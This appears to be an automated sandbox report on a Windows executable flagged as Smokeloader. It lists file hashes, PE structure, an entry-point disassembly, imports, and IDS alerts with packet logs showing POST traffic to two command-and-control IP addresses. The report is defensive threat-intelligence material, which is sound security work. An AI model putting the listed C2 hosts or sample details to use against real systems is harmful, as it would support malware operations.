                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):6.446097347649339
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:kGSZ4dCqYh.exe
                                                      File size:399'360 bytes
                                                      MD5:bab1912f10355b913050217669acc322
                                                      SHA1:17848e8aa5e443c06d495c500e642be0967cabe6
                                                      SHA256:38dc7521a2e99fb4c095f74b51dadf8b10fdf680ecbcecb419e6720e8151096d
                                                      SHA512:a96a1b0190a97e1d61ae00d82e85ab720a80c976d0f450eeaa4a9237ea337dc674746e23c458aa3023044cb7f9b6ad9d39a73c4401875876192d14fc437d012a
                                                      SSDEEP:6144:StLH/6zftGuIHMvxZ8NQhrOjAx99iqyyvw9R81aPFhbpxA5HcH/kWTW:SqfIu2GmOssxyyIL81aPFhtGuj
                                                      TLSH:4C84E1113AA0F870C5520E304D28D3E97ABEFC729A64598B371C7F5F7C39391A6A6706
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Z...Z...Z...D...z...D...B...D.......}3.._...Z...'...D...[...D...[...D...[...RichZ...................PE..L....z.d...........

                                                      File Icon

                                                      Icon Hash:63796de971436e0f

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x403a18
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x64F07A8F [Thu Aug 31 11:33:35 2023 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:0
                                                      File Version Major:5
                                                      File Version Minor:0
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:0
                                                      Import Hash:60292dd185c67d0ddd8dc10e8ecfb2bb

                                                      Entrypoint Preview

                                                      Instruction
                                                      call 00007F1F98815669h
                                                      jmp 00007F1F98810E8Eh
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      call 00007F1F9881104Ch
                                                      xchg cl, ch
                                                      jmp 00007F1F98811034h
                                                      call 00007F1F98811043h
                                                      fxch st(0), st(1)
                                                      jmp 00007F1F9881102Bh
                                                      fabs
                                                      fld1
                                                      mov ch, cl
                                                      xor cl, cl
                                                      jmp 00007F1F98811021h
                                                      mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                      fabs
                                                      fxch st(0), st(1)
                                                      fabs
                                                      fxch st(0), st(1)
                                                      fpatan
                                                      or cl, cl
                                                      je 00007F1F98811016h
                                                      fldpi
                                                      fsubrp st(1), st(0)
                                                      or ch, ch
                                                      je 00007F1F98811014h
                                                      fchs
                                                      ret
                                                      fabs
                                                      fld st(0), st(0)
                                                      fld st(0), st(0)
                                                      fld1
                                                      fsubrp st(1), st(0)
                                                      fxch st(0), st(1)
                                                      fld1
                                                      faddp st(1), st(0)
                                                      fmulp st(1), st(0)
                                                      ftst
                                                      wait
                                                      fstsw word ptr [ebp-000000A0h]
                                                      wait
                                                      test byte ptr [ebp-0000009Fh], 00000001h
                                                      jne 00007F1F98811017h
                                                      xor ch, ch
                                                      fsqrt
                                                      ret
                                                      pop eax
                                                      jmp 00007F1F9881582Fh
                                                      fstp st(0)
                                                      fld tbyte ptr [004497EAh]
                                                      ret
                                                      fstp st(0)
                                                      or cl, cl
                                                      je 00007F1F9881101Dh
                                                      fstp st(0)
                                                      fldpi
                                                      or ch, ch
                                                      je 00007F1F98811014h
                                                      fchs
                                                      ret
                                                      fstp st(0)
                                                      fldz
                                                      or ch, ch
                                                      je 00007F1F98811009h
                                                      fchs
                                                      ret
                                                      fstp st(0)
                                                      jmp 00007F1F98815805h
                                                      fstp st(0)
                                                      mov cl, ch
                                                      jmp 00007F1F98811012h
                                                      call 00007F1F98810FDEh
                                                      jmp 00007F1F98815810h
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3

                                                      Rich Headers

                                                      Programming Language:
                                                      • [C++] VS2008 build 21022
                                                      • [ASM] VS2008 build 21022
                                                      • [ C ] VS2008 build 21022
                                                      • [IMP] VS2005 build 50727
                                                      • [RES] VS2008 build 21022
                                                      • [LNK] VS2008 build 21022

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x477740x3c.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x5b0000x12b58.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x6e0000xa48.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x26900x40.text
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x19c.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x470d40x47200fdfc02f95441d5de39fe3ca16d404bdeFalse0.7339939861599297OpenPGP Secret Key Version 47.014294223606666IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .data0x490000x1185c0x600027249428db74ea0fe3ff506f8860ff3dFalse0.07784016927083333Matlab v4 mat-file (little endian) n2, sparse, rows 0, columns 00.9053342754782987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x5b0000x12b580x12c00e8d4a5e3d5fb7eafd6df3aa7ac23f8f5False0.40013020833333335data5.021811724306864IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x6e0000x14be0x16007ce203f0c14ffae82977c4b4b95d3fdaFalse0.4053622159090909data3.9742437726842943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      XUBONAVEGUCIZAKUFAMABAWADUJATA0x651300x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilIndia0.5879156423858196
                                                      XUBONAVEGUCIZAKUFAMABAWADUJATA0x651300x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilSri Lanka0.5879156423858196
                                                      RT_CURSOR0x66fc00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                                      RT_CURSOR0x67e680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                                      RT_CURSOR0x687100x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                                      RT_CURSOR0x68ca80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                                      RT_CURSOR0x68dd80xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                                      RT_CURSOR0x68eb00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                      RT_CURSOR0x69d580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                                      RT_CURSOR0x6a6000x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                                      RT_CURSOR0x6ab980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                                      RT_CURSOR0x6ba400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                                      RT_CURSOR0x6c2e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                                      RT_ICON0x5b7f00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5351382488479263
                                                      RT_ICON0x5b7f00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5351382488479263
                                                      RT_ICON0x5beb80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.41151452282157674
                                                      RT_ICON0x5beb80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.41151452282157674
                                                      RT_ICON0x5e4600x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.44680851063829785
                                                      RT_ICON0x5e4600x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.44680851063829785
                                                      RT_ICON0x5e8f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.36886993603411516
                                                      RT_ICON0x5e8f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.36886993603411516
                                                      RT_ICON0x5f7a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5130866425992779
                                                      RT_ICON0x5f7a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5130866425992779
                                                      RT_ICON0x600480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.5841013824884793
                                                      RT_ICON0x600480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.5841013824884793
                                                      RT_ICON0x607100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6502890173410405
                                                      RT_ICON0x607100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6502890173410405
                                                      RT_ICON0x60c780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.462448132780083
                                                      RT_ICON0x60c780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.462448132780083
                                                      RT_ICON0x632200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.475375234521576
                                                      RT_ICON0x632200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.475375234521576
                                                      RT_ICON0x642c80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.45778688524590166
                                                      RT_ICON0x642c80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.45778688524590166
                                                      RT_ICON0x64c500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.5106382978723404
                                                      RT_ICON0x64c500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.5106382978723404
                                                      RT_DIALOG0x6cad80x58data0.8977272727272727
                                                      RT_STRING0x6cb300x374dataTamilIndia0.46945701357466063
                                                      RT_STRING0x6cb300x374dataTamilSri Lanka0.46945701357466063
                                                      RT_STRING0x6cea80x2aedataTamilIndia0.478134110787172
                                                      RT_STRING0x6cea80x2aedataTamilSri Lanka0.478134110787172
                                                      RT_STRING0x6d1580x4e8dataTamilIndia0.4434713375796178
                                                      RT_STRING0x6d1580x4e8dataTamilSri Lanka0.4434713375796178
                                                      RT_STRING0x6d6400x514dataTamilIndia0.4276923076923077
                                                      RT_STRING0x6d6400x514dataTamilSri Lanka0.4276923076923077
                                                      RT_ACCELERATOR0x66f680x58dataTamilIndia0.7954545454545454
                                                      RT_ACCELERATOR0x66f680x58dataTamilSri Lanka0.7954545454545454
                                                      RT_GROUP_CURSOR0x68c780x30data0.9375
                                                      RT_GROUP_CURSOR0x68e880x22data1.0588235294117647
                                                      RT_GROUP_CURSOR0x6ab680x30data0.9375
                                                      RT_GROUP_CURSOR0x6c8500x30data0.9375
                                                      RT_GROUP_ICON0x5e8c80x30dataTamilIndia0.9375
                                                      RT_GROUP_ICON0x5e8c80x30dataTamilSri Lanka0.9375
                                                      RT_GROUP_ICON0x650b80x76dataTamilIndia0.6694915254237288
                                                      RT_GROUP_ICON0x650b80x76dataTamilSri Lanka0.6694915254237288
                                                      RT_VERSION0x6c8800x254data0.535234899328859

                                                      Imports

                                                      DLLImport
                                                      KERNEL32.dllGlobalCompact, CreateProcessW, InterlockedIncrement, GetCurrentProcess, GetLogicalDriveStringsW, CreateJobObjectW, SetComputerNameW, SetVolumeMountPointW, GetComputerNameW, GetTickCount, GetCommConfig, ClearCommBreak, GetConsoleAliasExesW, EnumTimeFormatsW, TlsSetValue, GetEnvironmentStrings, SetFileShortNameW, ReadConsoleInputA, GetVersionExW, GetFileAttributesA, GlobalMemoryStatus, GetModuleFileNameW, GetShortPathNameA, VerifyVersionInfoW, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceW, CreateNamedPipeA, SetFileAttributesA, LoadLibraryA, GetNumberFormatW, OpenJobObjectW, SetEnvironmentVariableA, GetCurrentDirectoryA, OpenEventW, LCMapStringW, CommConfigDialogW, GetTimeFormatW, GetTempFileNameW, HeapAlloc, HeapReAlloc, GetStartupInfoW, RaiseException, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsFree, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleHandleA, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WideCharToMultiByte, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
                                                      GDI32.dllGetCharWidth32A

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      TamilIndia
                                                      TamilSri Lanka

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-10-24T18:37:39.640493+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449736189.164.127.21780TCP
                                                      2024-10-24T18:38:58.525736+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450003189.164.127.21780TCP
                                                      2024-10-24T18:39:12.106292+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450004189.164.127.21780TCP
                                                      2024-10-24T18:39:31.867272+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.453258189.164.127.21780TCP
                                                      2024-10-24T18:39:51.793152+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.458682189.164.127.21780TCP
                                                      2024-10-24T18:40:12.354239+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.458683201.124.145.19680TCP
                                                      2024-10-24T18:40:27.315155+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.458684201.124.145.19680TCP
                                                      2024-10-24T18:40:45.531760+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.458685201.124.145.19680TCP
                                                      2024-10-24T18:41:03.377372+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.458686201.124.145.19680TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 24, 2024 18:37:38.809153080 CEST4973680192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:37:38.814568996 CEST8049736189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:37:38.814672947 CEST4973680192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:37:38.814829111 CEST4973680192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:37:38.814851046 CEST4973680192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:37:38.820297956 CEST8049736189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:37:38.820322990 CEST8049736189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:37:39.640352011 CEST8049736189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:37:39.640492916 CEST4973680192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:37:39.646840096 CEST4973680192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:37:39.652280092 CEST8049736189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:38:57.702812910 CEST5000380192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:38:57.708116055 CEST8050003189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:38:57.708194971 CEST5000380192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:38:57.708359957 CEST5000380192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:38:57.708403111 CEST5000380192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:38:57.713778019 CEST8050003189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:38:57.713787079 CEST8050003189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:38:58.525589943 CEST8050003189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:38:58.525736094 CEST5000380192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:38:58.525759935 CEST5000380192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:38:58.531079054 CEST8050003189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:39:11.292944908 CEST5000480192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:11.298408985 CEST8050004189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:39:11.298485041 CEST5000480192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:11.298638105 CEST5000480192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:11.298665047 CEST5000480192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:11.303926945 CEST8050004189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:39:11.303936958 CEST8050004189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:39:12.104166985 CEST8050004189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:39:12.106292009 CEST5000480192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:12.106292963 CEST5000480192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:12.111700058 CEST8050004189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:39:31.052088976 CEST5325880192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:31.057555914 CEST8053258189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:39:31.057660103 CEST5325880192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:31.057832003 CEST5325880192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:31.057862043 CEST5325880192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:31.063290119 CEST8053258189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:39:31.063405991 CEST8053258189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:39:31.867206097 CEST8053258189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:39:31.867271900 CEST5325880192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:31.867327929 CEST5325880192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:31.873389959 CEST8053258189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:39:50.970066071 CEST5868280192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:50.976711988 CEST8058682189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:39:50.976787090 CEST5868280192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:50.976933956 CEST5868280192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:50.976965904 CEST5868280192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:50.982501030 CEST8058682189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:39:50.983058929 CEST8058682189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:39:51.793059111 CEST8058682189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:39:51.793152094 CEST5868280192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:51.793653011 CEST5868280192.168.2.4189.164.127.217
                                                      Oct 24, 2024 18:39:51.799093008 CEST8058682189.164.127.217192.168.2.4
                                                      Oct 24, 2024 18:40:11.614111900 CEST5868380192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:11.619623899 CEST8058683201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:40:11.619712114 CEST5868380192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:11.621645927 CEST5868380192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:11.621646881 CEST5868380192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:11.627052069 CEST8058683201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:40:11.627221107 CEST8058683201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:40:12.353992939 CEST8058683201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:40:12.354238987 CEST5868380192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:12.354238987 CEST5868380192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:12.359880924 CEST8058683201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:40:26.488370895 CEST5868480192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:26.494388103 CEST8058684201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:40:26.494493961 CEST5868480192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:26.494584084 CEST5868480192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:26.494601011 CEST5868480192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:26.499955893 CEST8058684201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:40:26.500116110 CEST8058684201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:40:27.315067053 CEST8058684201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:40:27.315155029 CEST5868480192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:27.315222025 CEST5868480192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:27.320749044 CEST8058684201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:40:44.707995892 CEST5868580192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:44.713737011 CEST8058685201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:40:44.713851929 CEST5868580192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:44.713968992 CEST5868580192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:44.714004040 CEST5868580192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:44.719439983 CEST8058685201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:40:44.719499111 CEST8058685201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:40:45.531666994 CEST8058685201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:40:45.531759977 CEST5868580192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:45.533857107 CEST5868580192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:40:45.539627075 CEST8058685201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:41:02.543734074 CEST5868680192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:41:02.565335035 CEST8058686201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:41:02.565501928 CEST5868680192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:41:02.565610886 CEST5868680192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:41:02.565638065 CEST5868680192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:41:02.571108103 CEST8058686201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:41:02.571614027 CEST8058686201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:41:03.377175093 CEST8058686201.124.145.196192.168.2.4
                                                      Oct 24, 2024 18:41:03.377372026 CEST5868680192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:41:03.380084991 CEST5868680192.168.2.4201.124.145.196
                                                      Oct 24, 2024 18:41:03.385701895 CEST8058686201.124.145.196192.168.2.4

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 24, 2024 18:37:36.562937975 CEST6246053192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:37:37.560062885 CEST6246053192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:37:38.575629950 CEST6246053192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:37:38.807322979 CEST53624601.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:37:38.807343960 CEST53624601.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:37:38.807356119 CEST53624601.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:37:39.708722115 CEST5468553192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:37:40.700933933 CEST5468553192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:37:41.716922045 CEST5468553192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:37:43.731969118 CEST5468553192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:37:45.982157946 CEST53546851.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:37:45.982176065 CEST53546851.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:37:45.982188940 CEST53546851.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:37:45.982542992 CEST53546851.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:37:45.990561962 CEST6383853192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:37:46.001085043 CEST53638381.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:37:46.004443884 CEST5994953192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:37:46.997514009 CEST5994953192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:37:48.013371944 CEST5994953192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:37:50.043087006 CEST5994953192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:37:52.265104055 CEST53599491.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:37:52.265126944 CEST53599491.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:37:52.265140057 CEST53599491.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:37:52.265301943 CEST53599491.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:38:58.528233051 CEST5176653192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:38:59.517595053 CEST5176653192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:00.532829046 CEST5176653192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:02.544687986 CEST5176653192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:04.717839956 CEST53517661.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:04.717888117 CEST53517661.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:04.717899084 CEST53517661.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:04.717907906 CEST53517661.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:04.782851934 CEST5744753192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:04.793390036 CEST53574471.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:04.871172905 CEST6167953192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:05.873804092 CEST6167953192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:06.894021034 CEST6167953192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:08.894138098 CEST6167953192.168.2.41.1.1.1
                                                      Oct 24, 2024 18:39:11.105513096 CEST53616791.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:11.105526924 CEST53616791.1.1.1192.168.2.4
                                                      Oct 24, 2024 18:39:11.105535030 CEST53616791.1.1.1192.168.2.4
